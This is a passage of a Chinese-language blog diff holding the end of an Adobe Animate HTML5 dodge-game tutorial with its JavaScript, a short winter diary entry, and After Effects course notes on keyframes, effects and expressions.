    this.restart.y = -400;
    }else
    {
    this.restart.y = 350;
    }

    ​ 没挂的时候隐藏 restart 按钮,挂的时候显示 restart 按钮。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    function onRestart()
    {
    alive = true;
    this.weapon1.y = this.weapon2.y = this.weapon2.y = this.weapon3.y = this.weapon4.y = this.weapon5.y = -200;
    this.weapon1.x = Math.random() * 1870;
    this.weapon2.x = Math.random() * 1870;
    this.weapon3.x = Math.random() * 1870;
    this.weapon4.x = Math.random() * 1870;
    this.weapon5.x = Math.random() * 1870;
    }

    ​ 重置游戏的逻辑。

    使用 AN 制作 HTML5 小游戏-教程 07【Adobe Animate CC】

    png

    ​ 新建一个图层,新建一个文本对象,设为 动态文本,然后将对象命名为 scoreText

    png

    ​ 给人物移动动画最顶端加一个图层,用于放代码,前面几帧设置标签名 run

    png

    ​ 最后在尾巴新建一个关键帧,命名为 end

    png

    ​ 第 20 帧设置代码 this.gotoAndPlay("run"),表示到这一帧后回到第 0 帧重新播放。

    png

    ​ 第 21 帧设置代码 this.stop(),表示停止动画。

    png

    ​ 在第 21 帧,选中人头的图层,Ctrl + B 分离后,画一个被击中的表情。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    var speed = 30;
    var weaponSpeed = 30;
    var isOnLeft = false;
    var isOnRight = false;
    var keyCode = 0;
    var alive = true;
    var score = 0;

    this.left.addEventListener("click", onLeft.bind(this));

    function onLeft()
    {
    isOnLeft = true;
    }

    this.right.addEventListener("click", onRight.bind(this));

    function onRight()
    {
    isOnRight = true;
    }

    this.restart.addEventListener("click", onRestart.bind(this));

    function onRestart()
    {
    alive = true;
    this.weapon1.y = this.weapon2.y = this.weapon2.y = this.weapon3.y = this.weapon4.y = this.weapon5.y = -200;
    this.weapon1.x = Math.random() * 1870;
    this.weapon2.x = Math.random() * 1870;
    this.weapon3.x = Math.random() * 1870;
    this.weapon4.x = Math.random() * 1870;
    this.weapon5.x = Math.random() * 1870;
    score = 0;
    this.player.gotoAndPlay("run");
    }

    this.player.addEventListener("tick", Update.bind(this));

    function Update()
    {
    this.scoreText.text = "Score: " + score;
    if(alive)
    {
    Move(this.player);
    Weapon(this.weapon1, this.player);
    Weapon(this.weapon2, this.player);
    Weapon(this.weapon3, this.player);
    Weapon(this.weapon4, this.player);
    Weapon(this.weapon5, this.player);
    this.restart.y = -400;
    }else
    {
    this.restart.y = 350;
    }

    }

    document.addEventListener("keydown", function(e)
    {
    e = e || window.event;
    keyCode = e.keyCode || e.which || e.charCode;
    if(keyCode == 65) // A
    {
    isOnLeft = true;
    }
    if(keyCode == 68) // D
    {
    isOnRight = true;
    }
    })

    function Move(MC)
    {
    if(isOnLeft && MC.x > 250)
    {
    MC.x -= speed;
    }
    if(isOnRight && MC.x <= 1870)
    {
    MC.x += speed;
    }
    isOnLeft = isOnRight = false;
    }

    function Weapon(WE, MC)
    {
    if(WE.x >= MC.x - 160 && WE.x <= MC.x + 160 && WE.y >= MC.y && WE.y <= MC.y + 400) // 碰撞检测
    {
    alive = false;
    WE.y = -200;
    WE.x = Math.random() * 1870;
    MC.gotoAndStop("end");
    }
    if(WE.y >= 1000) // 掉出界外
    {
    score += 1;
    WE.y = -200;
    WE.x = Math.random() * 1870;
    }
    else
    {
    WE.y += weaponSpeed;
    }
    }

    ​ 最终代码。

    • 主要就是重新开始时:this.player.gotoAndPlay("run"),恢复人物动画。

    • 碰到武器时:MC.gotoAndStop("end");,跳到第 21 帧。


    ​ 最终效果。可以在 hexo 上跑,但是当时画布设置的太大了 orz……


    ​ 修改画布大小,网页中:

    • 因为新建的画布是 16:9 的,所以宽度设为 100%,画布 padding-bottom 设为 56.25%(代替 height):
    • margin: 0 auto; 居中对齐。
    1
    2
    3
    4
    5
    6
    7
    8
    <!-- write your code here -->
    <body onload="init();" style="margin:0px;">
    <div id="animation_container" style="background-color:rgba(255, 255, 255, 1.00); width:100%;padding-bottom: 56.25%;height: 0;margin: 0 auto;">
    <canvas id="canvas" width="1920" height="1080" style=";margin: 0 auto;display: block; background-color:rgba(255, 255, 255, 1.00);"></canvas>
    <div id="dom_overlay_container" style="pointer-events:none; overflow:hidden; width:1920px; height:1080px; position: absolute; left: 0px; top: 0px; display: block;">
    </div>
    </div>
    </body>

    ​ Game.js 中:

    1
    2
    3
    domContainers.forEach(function(container) {
    container.style.width = '100%';
    });

    ​ 开跑!


    ]]>
    @@ -3816,7 +3816,7 @@ /posts/Diary-7-%E6%87%92%E6%B4%8B%E6%B4%8B/ - 前言

    ​ 这段时间好像没有发生什么特别值得我记录的事情,写英语 / 学习 Adobe 全家桶交替循环。

    jpg

    梧桐与银杏

    ​ 银杏叶子都寄了。

    ​ 保定气候播报:

    # y 轴数据(假设为温度和 PM 值)
    y1 = [-7, -8, -9, -10, -9, -8, -7, -6, -5, -5, -4, 0, -3, -5] # 当日最低温
    y2 = [10, 10, 4, 3, 6, 7, 10, 10, 10, 12, 14, 20, 8, 2] # 当日最高温
    y3 = [144, 105, 43, 73, 75, 105, 144, 143, 89, 208, 112, 154, 115, 53] # 当日 PM 值

    png

    正文

    11.27

    ​ 给论文打了个草稿,跟导师汇报了下,虽然效果就那样,也蛮开始写吧。

    ​ 智算中心的算力被我造得差不多了,申请下一批算力要到十二月中了,实验得停滞一段时间了。

    11.28

    ​ 六级考试快到了,要不去图书馆刷刷英语吧。

    ​ 这论文无聊得我宁愿去图书馆写英语都不想写论文了。

    ​ 这段时间非常困倦,困得我想冬眠。

    12.1

    jpg

    咸鱼

    ​ 气温已经零下很久了,东湖表面已经结了厚厚的冰。这只咸鱼是怎么被冻在湖里的?

    12.2

    jpg

    啊!真有家乡的味道!

    ​ 食堂饺子店的酱油和蒜头酱的蘸料配起来感觉不好吃,直接买了包番茄酱制作外地人不能接受的黑暗料理😇,味道真是好极了!

    12.5

    jpg

    没啥人啊

    ​ 这段时间应该是考研党的冲刺时刻了,而冀大的图书馆早却没什么人?不知道是考研的人少了还是大家都起不来了。

    12.6

    ​ 组会上导师说周六要下雪,关某心心念念的下雪终于要见到了。

    12.10

    结果还是没下,真是太不走运了!

    ​ 晚上下了很大的雪,真是太走运了!

    ]]>
    + 前言

    ​ 这段时间好像没有发生什么特别值得我记录的事情,写英语 / 学习 Adobe 全家桶交替循环。

    jpg

    梧桐与银杏

    ​ 银杏叶子都寄了。

    ​ 保定气候播报:

    1
    2
    3
    4
    # y 轴数据(假设为温度和 PM 值)
    y1 = [-7, -8, -9, -10, -9, -8, -7, -6, -5, -5, -4, 0, -3, -5] # 当日最低温
    y2 = [10, 10, 4, 3, 6, 7, 10, 10, 10, 12, 14, 20, 8, 2] # 当日最高温
    y3 = [144, 105, 43, 73, 75, 105, 144, 143, 89, 208, 112, 154, 115, 53] # 当日 PM 值

    png

    正文

    11.27

    ​ 给论文打了个草稿,跟导师汇报了下,虽然效果就那样,也蛮开始写吧。

    ​ 智算中心的算力被我造得差不多了,申请下一批算力要到十二月中了,实验得停滞一段时间了。

    11.28

    ​ 六级考试快到了,要不去图书馆刷刷英语吧。

    ​ 这论文无聊得我宁愿去图书馆写英语都不想写论文了。

    ​ 这段时间非常困倦,困得我想冬眠。

    12.1

    jpg

    咸鱼

    ​ 气温已经零下很久了,东湖表面已经结了厚厚的冰。这只咸鱼是怎么被冻在湖里的?

    12.2

    jpg

    啊!真有家乡的味道!

    ​ 食堂饺子店的酱油和蒜头酱的蘸料配起来感觉不好吃,直接买了包番茄酱制作外地人不能接受的黑暗料理😇,味道真是好极了!

    12.5

    jpg

    没啥人啊

    ​ 这段时间应该是考研党的冲刺时刻了,而冀大的图书馆早却没什么人?不知道是考研的人少了还是大家都起不来了。

    12.6

    ​ 组会上导师说周六要下雪,关某心心念念的下雪终于要见到了。

    12.10

    结果还是没下,真是太不走运了!

    ​ 晚上下了很大的雪,真是太走运了!

    ]]>
    @@ -3872,7 +3872,7 @@ /posts/Software-AE/ - 资源

    课程

    ##【00-AE 先导课】- 怎么学习 AE 最高效

    • 基础篇
    • 动画篇
    • 特效篇
    • 表达式
    • 实战篇

    ##【01-AE 概念篇】- 从 AE 的合成开始讲起

    png

    ​ 对于预设:

    • 电视制式
      • PAL 制:每秒 25 帧,隔行扫描。中国、德国、英国等国家采用这种制式。
      • NTSC 制:每秒 29.97 帧,隔行扫描。美国、加拿大和日本等国家采用这种制式。

    ​ 持续时间单位:时:分:秒:帧


    本章总结
    • AE 的用途
      AE 是一款用于高端视频特效系统的专业特效合成软件,通过对收集到的素材进行数字化的编辑组合到一起,进行艺术性的再加工后得到的最终作品。


    • 帧是影像动画中最小单位的单幅影像画面,相当于电影胶片上的每一格镜头。一帧就是一幅静止的画面,连续的帧就形成动画,如电视图象等。

    • 帧数率
      在 1 秒钟时间里传输的图片的帧数,也可以理解为图形处理器每秒钟能够刷新几次,通常用 fps (Frames PerSecond) 表示。

    • 关键帧
      是编辑动画和处理特效的核心技术。关键帧记录动画或特效的特征及参数中间画面的参数则由计算机自动运算并添加。

    • 高清视频
      物理分辨率达到 720p 以上统称为高清,简称 HD(高分辨率)。国际上公认的有两条关于高清的标准:视频垂直分辨率超过 720p 或 1080i;视频宽高比为 16 : 9 。全高清是指物理分辨率高达 1920 x 1080 显示。

    • 常用视频格式

      • AVI (Audio Video Interlaced) 格式
      • MOV 格式
      • MPEG 格式
      • WMV 格式
      • MP4 格式(编码格式:H.264)
      • TGA 序列文件
    • 常用视频格式

      • WAV 格式
      • MP3 格式

    【AME 教程】『只用5分钟 , Adobe MediaEncoder工具彻底参透』告别格式工厂!专业级队列渲染/格式转码工具最基础教程


    ​ Adobe Media Encoder 是一个视频和音频编码应用程序,可以针对不同应用程序和观众,以各种分发格式对音频和视频文件进行编码。

    • 格式转换(类似格式工厂)
    • 分队列渲染(由 PR / AE 中导出队列)
    • 批量监视
    • 预设编译(渲染指定预设的视频,如 Youtube 预设)

    ##【02-AE 概念课】- AE 工具栏都有什么样用

    ​ 教你熟悉 AE 的各种工具,跟 PS 和 AI 差不多吧。

    ​ 按 Alt 和工具键切换工具。

    png

    ​ 创建蒙版。


    ​ 层级:项目 > 合成 > 图层


    png

    ​ 调整对象属性。

    ##【03-AE 实战课】- AE 关键帧动画基础概念

    png

    ​ 可以让物体沿着某个钢笔路径进行移动。


    ​ 多选多个关键帧,Alt 可以对关键帧动画进行缩放。

    png

    时间反向关键帧,可以将关键帧动画倒序。


    本章总结
    • 时间轴面板

      • 修改合成设置(快捷键 - Ctrl + K
        可以对现有合成的参数进行修改
      • 预览 / 暂停视频(快捷键 - 空格键)
        播放时间轴上的画面
      • 设定预览长度 (快捷键 - B / N)
        确定预览的时间长度,B 是入点,N 是出点
      • 调整显示比例(快捷键 - Alt + 鼠标滑轮
        调节时间线面板中时间线显示比例的大小
      • 逐帧调节时间线(快捷键 - Page Up / Page Down
        可以逐帧移动时间线
      • 分隔素材(快捷键 - Ctrl + shift + D
        在当前时间点,对当前素材进行分隔
      • 裁剪素材 (快捷键 - Alt + [ / ]
        在当前时间点,对素材进行裁剪
    • 关键帧动画

      • 图层位置属性(快捷键 - P
        可以对图层的位移进行调整
      • 图层缩放属性(快捷键 - S
        可以调节图层的缩放数值
      • 图层中心点属性(快捷键 - Y
        调节素材中心点的位置
      • 图层旋转属性(快捷键 - R
        可以调出旋转属性,对素材进行旋转调整
      • 图层透明度属性(快捷键 - T
        调出透明度属性,对素材的透明度进行调整
      • 查看关键帧(快捷键 - U
        可以查看图层已经创建的全部关键帧
      • 查看上一帧 / 下一帧(快捷键 - J / K
        直接前一个关键帧或者后一个关键帧

    ##【04-AE 实战课】- AE 关键帧动画基础练习- 街道汽车超车

    png

    ​ 导入 PSD 格式的素材时,导入种类选择 合成-保持图层大小

    png

    ​ 首选项中把摄像机导航关了,避免快捷键冲突。

    png

    ​ 就是制作简单的帧动画了。

    Shift + 数字键(非小键盘) 设定标记时间,数字键(非小键盘) 转到对应标记时间。(记住不要在中文输入法下!)

    gif

    ​ 最终效果。


    本章总结
    • 导入素材
      • 导入“街景.PSD”素材,选择“合成-保持图层大小”。
      • 调整背景图层的大小,使背景图层比合成要大。
      • 调整小车的大小,使车的大小与马路大小相互协调。
    • 制作动画
      • 在时间线 0s 时,把绿车放在合成左端并移出合成外,单击位置属性下的关键帧秒表,记录当前绿车的位置。
      • 在时间线 10s 时,将绿车水平移动到合成右端并移出合成外,自动记录当前绿车的位置,完成绿车的位移动画。
      • 在时间线 0s 时,把黄车放在绿车的左边,单击位置属性下的关键帧秒表,记录当前黄车的位置。
      • 在时间线 4~7s 之间选择合适时间点,移动黄车的位置,使黄车位置处于另外一条马路。
      • 在时间线 9s 时,将黄车水平移动到绿车右边,使黄车再更短的时间,完成更远的距离,完成黄车的加速动画。
      • 调整黄车路径细节,使黄车超车的动画更加顺畅。

    【05-AE实战课】- AE基础效果湍流置换-制作奶茶动画

    png

    ​ 如果在图像图层上直接使用钢笔工具,会给这个图层画蒙版。

    png

    ​ 新建一个矩形,在 效果与预设 中,设定 湍流置换

    ​ 通过操作湍流置换里的参数(数量 / 大小 / 偏移(湍流)/ 复杂度 / 演化),达到水波的效果。

    png

    ​ 选择图层,Ctrl + D 复制一份,换个颜色。

    png

    选择两个图层,Ctrl + Shift + C 预合成,相当于将两个图层合并在一起。

    png

    ​ 用钢笔工具建立 形状图层 1,画出奶茶杯的区域。

    F4 显示轨道遮罩选项,将 预合成 1 的轨道遮罩设为 形状图层 1

    png

    ​ 修改位移的时间轴动画。

    gif

    ​ 最终效果。


    本章小结
    • 导入素材
      • 导入“街景.PSD”素材,选择“合成-保持图层大小”。
      • 熟悉图层,找到茶 1、茶 2 两个图层。
    • 制作动画
      • 用矩形工具创建一个矩形,颜色可以自行选择。
      • 找到效果-扭曲-湍流置换效果,添加在当前矩形的图层上。
      • 调整数量、大小等参数,使波形适合需要的效果。
      • 对演化参数创建关键帧,选择需要的时间点创建关键帧动画。
      • 把当前矩形复制一层,修改颜色,调整湍流置换的参数,使其波纹的形态和前一层有所区别。
      • 将两个图层嵌套在一个合成里,对合成的位移属性进行 k 帧,达到从上至下的效果。
      • 使用钢笔工具创建一个杯子的形状,用合成和该形状创建剪切蒙版。
      • 预览动画效果,调整细节。

    ##【06-AE 实战课】- AE 基础效果集-制作 HELLO SUMMER 动画

    png

    ​ 导入素材,Ctrl + K 调整画布宽高。

    png

    ​ 给水影子整一个湍流置换。

    png

    ​ 修改湍流置换的参数整一个关键帧动画。

    png

    ​ 设定父级,方便操作,整一个旋转的关键帧动画。

    png

    人偶控制点工具(Ctrl + P),类似骨骼动画。

    png

    ​ 可以调节变换曲线。

    gif

    ​ 最终效果。


    本章小结
    • 导入素材
      • 导入“泳池.PSD”素材,选择“合成-保持图层大小”。
      • 熟悉图层,找到水影子、水波纹两个图层。
    • 制作动画
      • 为水影子、水波纹两个图层添加“湍流置换”效果,调整细节参数,创建关键顿动画。
      • 反复预览动画效果,调节参数细节,达到自己想要的效果。
      • 将水影子、水波纹两个图层预合成 (Ctrl + Shift + C)
      • 复制泳池底图层,利用泳池地图层对刚刚的预合成进行剪切蒙版,控制波形范围。
      • 找到人物的几个图层,将其预合成 (Ctrl + Shift + C)
      • 为人物图层添加“湍流置换”效果,调整细节参数。波形变化幅度不用太大。
      • 用不同的方法,为环境中其他的元素添加小动画。
      • 预览动画效果,调整细节。

    【07-AE实战课】- AE线性动画和非线性动画基础概念

    png

    ​ 可以给物体打开运动模糊。

    ​ 按 F9 给关键帧动画增加缓动效果,曲线编辑器中可以调整位置曲线与速度曲线。

    ​ 高中物理告诉我们,速度是位移对时间求导。


    本章小结
    • 缓动动画(快捷键 - F9

      自然界中的物体从起点移动到终点时,速度从来不是一成不变的。汽车启动时速度会由慢变快,停止时则由快变慢,篮球落地时会在地上来回反弹,并逐渐停止运动。大家都期待事物的呈现遵循一定的运动规律,要制作出更加自然的动画,就需要理解什么是缓动函数。简单来说,缓动函数用于控制动画从初始值运动到最终值的速率。所以,在制作动画时适当的使用缓动函数能让观众得到更舒适的视觉体验。先使用 F9 将选中的关键帧变为平滑帧,点击图表编辑器图标,在图表编辑器面板中单击右键选择编辑速度图标即可调整运动的快慢。

    • 运动模糊

      打开了运动模糊标签开关后,快速运动的物体会产生一定的模糊效果在图层开关栏中打开运动模糊开关,在时间线面板中打开运动模糊总开关,即可看到效果。

    ##【08-AE 实战课】- AE 日夜交替 UI 风动画制作

    png

    ​ 导入白天和夜晚两个合成,再将这俩结合成一个合成(相当于文件夹里套文件夹)。

    png

    png

    ​ 给开关移动制作帧动画,文字透明度制作帧动画。

    png

    ​ 新建一个圆,做白天的反模板。

    png

    ​ 修改速度曲线,先快后慢。

    png

    ​ 设置运动模糊。

    png

    ​ 继续修改速度曲线。

    gif

    ​ 最终效果。


    本章小结
    • 导入素材
      • 选取同时有白天和夜晚两种形态的素材。
      • 思考动画效果,整理图层,并以合成的形式导入 AE。
    • 制作动画
      • 给按钮图层制作往复的位移动画。
      • 按照按钮的动画节点,把文字添加相应的不透明度动画。
      • 确保白天和夜晚两个合成内,按钮的动画一致。
      • 在夜晚的合成中,寻找合适的时间点为月亮添加位移动画。
      • 为白天的合成,添加蒙版,通过蒙版的缩放动画,完成日夜交替的效果。
      • 将所有的关键帧调整为平滑帧,调节速度曲线,达到自己想要的效果。
      • 给做了动效的图层打开运动模糊,打开运动模糊的总开关。
      • 预览动画效果,调整细节。

    【09-AE实战课】- AE创意合成海底世界

    png

    ​ 导入视频素材,调整色调,将黑色映射到深蓝。

    png

    ​ 调整曲线。

    ​ 教程给的 Trapcode 和 Universe 插件太老了,自己上网再整一个吧。

    png

    ​ 设置水色光(浅绿色),继续调整曲线。

    png

    ​ 增加效果 Heatwave 以增加斑驳感。

    png

    ​ 顶层新建一个纯色,添加效果 Optical Flares,整一个耶稣光。

    png

    ​ 混合模式选择 屏幕,把黑色给我删了。

    png

    ​ 调整 Optical Flares 的帧动画:旋转偏移、动画演变。

    png

    ​ 顶层新建一个纯色图层,整一个湍流杂色。

    png

    CC Vector Blur 增加模糊效果。

    ​ 使用叠加效果。

    png

    ​ 多复制几个。

    png

    ​ 如果要多个图层共用一个效果,新建一个调整图层。

    png

    ​ 调整图层里放好效果,放在要应用效果图层的顶端。

    png

    ​ 导入 png 序列。

    png

    ​ 水平翻转。

    png

    ​ 适合复合帮你缩放到合适大小。

    png

    ​ 给水母整一个帧动画。

    png

    CC Particle Systems II,跟 Unity / Blender 里的粒子系统差不多。

    png

    ​ 一阵操作整一个气泡效果。

    png

    ​ 最后再整一个 CC Lens,镜头扭曲。

    gif

    ​ 最终效果。


    本章小结
    • 制作动画
      • 导入“城堡.mp4”素材,新建调整图层。
      • 在调整图层上添加“色调”和“曲线”两个效果,将城堡的整体色调调整为比较暗的蓝色。
      • 在调整图层上添加“Shine”效果,调整光源位置,更改着色模式为水色光。
      • 在调整图层上添加“uni.Heatwave”效果,让海底有一种热浪的感觉,观察整体效果,适当调整色调和曲线。
      • 新建纯色层,添加“OpticalFlares”效果,增加海平面透光的效果,调整光源位置和细节参数。
      • 新建纯色层,添加“湍流杂色”制作水波反射效果,添加“CCVectorBlur”使其更逼真。
      • 复制几层水波纹反射图层,打开水波纹反射图层的三维属性,调整到合适的位置。
      • 新建纯色层,添加“CCParticle System II”效果,修改参数制作海底气泡效果。
      • 添加海底生物素材,使画面更丰富,海底生物的素材应该放在调整图层的下方。
      • 将所有图层预合成,并添加“CCLens”效果,使其有一点变形的感觉。
      • 为视频添加音效和环境音,让整体画面更加和谐。

    ##【10-AE 表达式】- 抖动表达式 Wiggle 的基础用法

    png

    ​ 以 合成 - 保持图层大小,图层选项 可编辑的图层样式

    png

    ​ 将表情打成一个预合成,按 Alt + 左键 点击秒表,调出表达式,选择 Property - wiggle(freq, amp, octaves = 1, amp_mult = 5, t = time)

    png

    wiggle(100, 6)

    ​ 设置 freq=100amp=6

    png

    ​ 将双眼打成一个预合成。

    png

    ​ 给眼睛整一个帧动画。

    png

    F9 改成缓动,修改速度曲线。

    gif

    ​ 最终效果。

    ##【11-AE 表达式】- 循环表达式 loopOut 的基础用法

    png

    ​ 以 合成图层大小 来导入 .ai 文件。

    png

    ​ 将钟摆的锚点挪到最上方。

    png

    loopOut("Cycle")

    ​ 设置三个关键帧动画(左摆-右摆-左摆),设置表达式 loopOut("Cycle")

    ​ 就会得到循环的动画。

    png

    loopOut("PingPong")

    ​ 设置三个关键帧动画(左摆-右摆),设置表达式 loopOut("PingPong")

    ​ 自动帮你把动画再逆序播放一遍,得到跟上版一样的效果。

    gif

    ​ 最终效果。

    ##【12-AE 表达式】- 时间表达式 Time 的基础用法

    png

    ​ 用矩形工具画个斑纹,打成一个预合成。

    png

    ​ 添加 CC Sphere 效果,把分辨率调整成四分之一(这里 AE 容易崩溃)。

    ​ 微调旋转参数。

    png

    ​ 制作上下移动的帧动画。

    png

    ​ 调整曲线,先快后慢。

    png

    time * 360

    ​ 对 CC SphereRotation Y 属性设置表达式 time * 360,它就会 360 度乱转。

    png

    ​ 用椭圆工具建一个阴影,调整缩放的帧动画。

    png

    ​ 调整不透明度的帧动画。

    gif

    ​ 最终效果。

    ##【13-AE 跟踪器】- AE 跟踪器给空间位置捆绑文本

    png

    ​ 新建一个相机。

    png

    ​ 界面变成 3D 的,之后的操作就跟 3D 引擎差不多了。

    png

    ​ 导入一个航拍视频,窗口里调出 跟踪器,点击 跟踪摄像机,电脑就会分析这个视频(光流估计?)生成若干 3D 标记点。

    png

    ​ 随便选一个点,创建文本和摄像机

    png

    ​ 此时就会创建一个文本的 3D 对象,操作它。

    png

    ​ 也可以选择三个点创建文本。

    png

    ​ 操作它。

    png

    ​ 给文本复制一个,添加描边并稍微向后移动一点距离,做一个 3D 文字阴影效果。

    gif

    ​ 最终效果。

    ]]>
    + 资源

    课程

    ##【00-AE 先导课】- 怎么学习 AE 最高效

    • 基础篇
    • 动画篇
    • 特效篇
    • 表达式
    • 实战篇

    ##【01-AE 概念篇】- 从 AE 的合成开始讲起

    png

    ​ 对于预设:

    • 电视制式
      • PAL 制:每秒 25 帧,隔行扫描。中国、德国、英国等国家采用这种制式。
      • NTSC 制:每秒 29.97 帧,隔行扫描。美国、加拿大和日本等国家采用这种制式。

    ​ 持续时间单位:时:分:秒:帧


    本章总结
    • AE 的用途
      AE 是一款用于高端视频特效系统的专业特效合成软件,通过对收集到的素材进行数字化的编辑组合到一起,进行艺术性的再加工后得到的最终作品。


    • 帧是影像动画中最小单位的单幅影像画面,相当于电影胶片上的每一格镜头。一帧就是一幅静止的画面,连续的帧就形成动画,如电视图象等。

    • 帧数率
      在 1 秒钟时间里传输的图片的帧数,也可以理解为图形处理器每秒钟能够刷新几次,通常用 fps (Frames PerSecond) 表示。

    • 关键帧
      是编辑动画和处理特效的核心技术。关键帧记录动画或特效的特征及参数中间画面的参数则由计算机自动运算并添加。

    • 高清视频
      物理分辨率达到 720p 以上统称为高清,简称 HD(高分辨率)。国际上公认的有两条关于高清的标准:视频垂直分辨率超过 720p 或 1080i;视频宽高比为 16 : 9 。全高清是指物理分辨率高达 1920 x 1080 显示。

    • 常用视频格式

      • AVI (Audio Video Interlaced) 格式
      • MOV 格式
      • MPEG 格式
      • WMV 格式
      • MP4 格式(编码格式:H.264)
      • TGA 序列文件
    • 常用视频格式

      • WAV 格式
      • MP3 格式

    【AME 教程】『只用5分钟 , Adobe MediaEncoder工具彻底参透』告别格式工厂!专业级队列渲染/格式转码工具最基础教程


    ​ Adobe Media Encoder 是一个视频和音频编码应用程序,可以针对不同应用程序和观众,以各种分发格式对音频和视频文件进行编码。

    • 格式转换(类似格式工厂)
    • 分队列渲染(由 PR / AE 中导出队列)
    • 批量监视
    • 预设编译(渲染指定预设的视频,如 Youtube 预设)

    ##【02-AE 概念课】- AE 工具栏都有什么样用

    ​ 教你熟悉 AE 的各种工具,跟 PS 和 AI 差不多吧。

    ​ 按 Alt 和工具键切换工具。

    png

    ​ 创建蒙版。


    ​ 层级:项目 > 合成 > 图层


    png

    ​ 调整对象属性。

    ##【03-AE 实战课】- AE 关键帧动画基础概念

    png

    ​ 可以让物体沿着某个钢笔路径进行移动。


    ​ 多选多个关键帧,Alt 可以对关键帧动画进行缩放。

    png

    时间反向关键帧,可以将关键帧动画倒序。


    本章总结
    • 时间轴面板

      • 修改合成设置(快捷键 - Ctrl + K
        可以对现有合成的参数进行修改
      • 预览 / 暂停视频(快捷键 - 空格键)
        播放时间轴上的画面
      • 设定预览长度 (快捷键 - B / N)
        确定预览的时间长度,B 是入点,N 是出点
      • 调整显示比例(快捷键 - Alt + 鼠标滑轮
        调节时间线面板中时间线显示比例的大小
      • 逐帧调节时间线(快捷键 - Page Up / Page Down
        可以逐帧移动时间线
      • 分隔素材(快捷键 - Ctrl + shift + D
        在当前时间点,对当前素材进行分隔
      • 裁剪素材 (快捷键 - Alt + [ / ]
        在当前时间点,对素材进行裁剪
    • 关键帧动画

      • 图层位置属性(快捷键 - P
        可以对图层的位移进行调整
      • 图层缩放属性(快捷键 - S
        可以调节图层的缩放数值
      • 图层中心点属性(快捷键 - Y
        调节素材中心点的位置
      • 图层旋转属性(快捷键 - R
        可以调出旋转属性,对素材进行旋转调整
      • 图层透明度属性(快捷键 - T
        调出透明度属性,对素材的透明度进行调整
      • 查看关键帧(快捷键 - U
        可以查看图层已经创建的全部关键帧
      • 查看上一帧 / 下一帧(快捷键 - J / K
        直接前一个关键帧或者后一个关键帧

    ##【04-AE 实战课】- AE 关键帧动画基础练习- 街道汽车超车

    png

    ​ 导入 PSD 格式的素材时,导入种类选择 合成-保持图层大小

    png

    ​ 首选项中把摄像机导航关了,避免快捷键冲突。

    png

    ​ 就是制作简单的帧动画了。

    Shift + 数字键(非小键盘) 设定标记时间,数字键(非小键盘) 转到对应标记时间。(记住不要在中文输入法下!)

    gif

    ​ 最终效果。


    本章总结
    • 导入素材
      • 导入“街景.PSD”素材,选择“合成-保持图层大小”。
      • 调整背景图层的大小,使背景图层比合成要大。
      • 调整小车的大小,使车的大小与马路大小相互协调。
    • 制作动画
      • 在时间线 0s 时,把绿车放在合成左端并移出合成外,单击位置属性下的关键帧秒表,记录当前绿车的位置。
      • 在时间线 10s 时,将绿车水平移动到合成右端并移出合成外,自动记录当前绿车的位置,完成绿车的位移动画。
      • 在时间线 0s 时,把黄车放在绿车的左边,单击位置属性下的关键帧秒表,记录当前黄车的位置。
      • 在时间线 4~7s 之间选择合适时间点,移动黄车的位置,使黄车位置处于另外一条马路。
      • 在时间线 9s 时,将黄车水平移动到绿车右边,使黄车再更短的时间,完成更远的距离,完成黄车的加速动画。
      • 调整黄车路径细节,使黄车超车的动画更加顺畅。

    【05-AE实战课】- AE基础效果湍流置换-制作奶茶动画

    png

    ​ 如果在图像图层上直接使用钢笔工具,会给这个图层画蒙版。

    png

    ​ 新建一个矩形,在 效果与预设 中,设定 湍流置换

    ​ 通过操作湍流置换里的参数(数量 / 大小 / 偏移(湍流)/ 复杂度 / 演化),达到水波的效果。

    png

    ​ 选择图层,Ctrl + D 复制一份,换个颜色。

    png

    选择两个图层,Ctrl + Shift + C 预合成,相当于将两个图层合并在一起。

    png

    ​ 用钢笔工具建立 形状图层 1,画出奶茶杯的区域。

    F4 显示轨道遮罩选项,将 预合成 1 的轨道遮罩设为 形状图层 1

    png

    ​ 修改位移的时间轴动画。

    gif

    ​ 最终效果。


    本章小结
    • 导入素材
      • 导入“街景.PSD”素材,选择“合成-保持图层大小”。
      • 熟悉图层,找到茶 1、茶 2 两个图层。
    • 制作动画
      • 用矩形工具创建一个矩形,颜色可以自行选择。
      • 找到效果-扭曲-湍流置换效果,添加在当前矩形的图层上。
      • 调整数量、大小等参数,使波形适合需要的效果。
      • 对演化参数创建关键帧,选择需要的时间点创建关键帧动画。
      • 把当前矩形复制一层,修改颜色,调整湍流置换的参数,使其波纹的形态和前一层有所区别。
      • 将两个图层嵌套在一个合成里,对合成的位移属性进行 k 帧,达到从上至下的效果。
      • 使用钢笔工具创建一个杯子的形状,用合成和该形状创建剪切蒙版。
      • 预览动画效果,调整细节。

    ##【06-AE 实战课】- AE 基础效果集-制作 HELLO SUMMER 动画

    png

    ​ 导入素材,Ctrl + K 调整画布宽高。

    png

    ​ 给水影子整一个湍流置换。

    png

    ​ 修改湍流置换的参数整一个关键帧动画。

    png

    ​ 设定父级,方便操作,整一个旋转的关键帧动画。

    png

    人偶控制点工具(Ctrl + P),类似骨骼动画。

    png

    ​ 可以调节变换曲线。

    gif

    ​ 最终效果。


    本章小结
    • 导入素材
      • 导入“泳池.PSD”素材,选择“合成-保持图层大小”。
      • 熟悉图层,找到水影子、水波纹两个图层。
    • 制作动画
      • 为水影子、水波纹两个图层添加“湍流置换”效果,调整细节参数,创建关键顿动画。
      • 反复预览动画效果,调节参数细节,达到自己想要的效果。
      • 将水影子、水波纹两个图层预合成 (Ctrl + Shift + C)
      • 复制泳池底图层,利用泳池地图层对刚刚的预合成进行剪切蒙版,控制波形范围。
      • 找到人物的几个图层,将其预合成 (Ctrl + Shift + C)
      • 为人物图层添加“湍流置换”效果,调整细节参数。波形变化幅度不用太大。
      • 用不同的方法,为环境中其他的元素添加小动画。
